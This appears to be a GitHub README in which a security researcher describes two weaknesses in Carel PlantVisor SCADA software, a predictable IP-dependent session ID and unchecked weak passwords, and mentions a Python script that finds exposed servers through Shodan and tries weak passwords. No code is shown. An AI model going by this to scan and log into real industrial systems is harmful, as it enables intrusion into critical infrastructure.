DISCLAIMER: This information is too old, but I recently created a GitHub account and I want to use it for the first time, so I have take any ramdom project from my hard disk :-P

Some time ago one more SCADA system showed its lack of security. Several vulnerabilities in Carel PlantVisor were published by people like Luigi Auriemma and other people, like Hispasec guys and myself, enjoyed playing with these first level wargames systems.

In addition to the vulnerabilities already exposed, I could see (al least) two other attack vectors:

• The session ID (SessionID) used to control de authentication its totally predictable and it looks like dependent on the IP of the client. In this way, it would be possible to reach some privileged functions if there is an admin already logged in at the same time and we shared the IP (NAT, etc.) or if the Carel PlantVisor server lie behind a reverse proxy or load balancer.

• There is a bunch of trivial passwords out there! The application doesn't control the passwords strength. To search this low hanging fruit I developed a little python script that search Carel servers in Shodan (You need a Shodan API key) and test weak passwords. Of course, this script was developed to test the security of authorized infrastructures, and it shouldn't be used without permission of the server administrator/owner.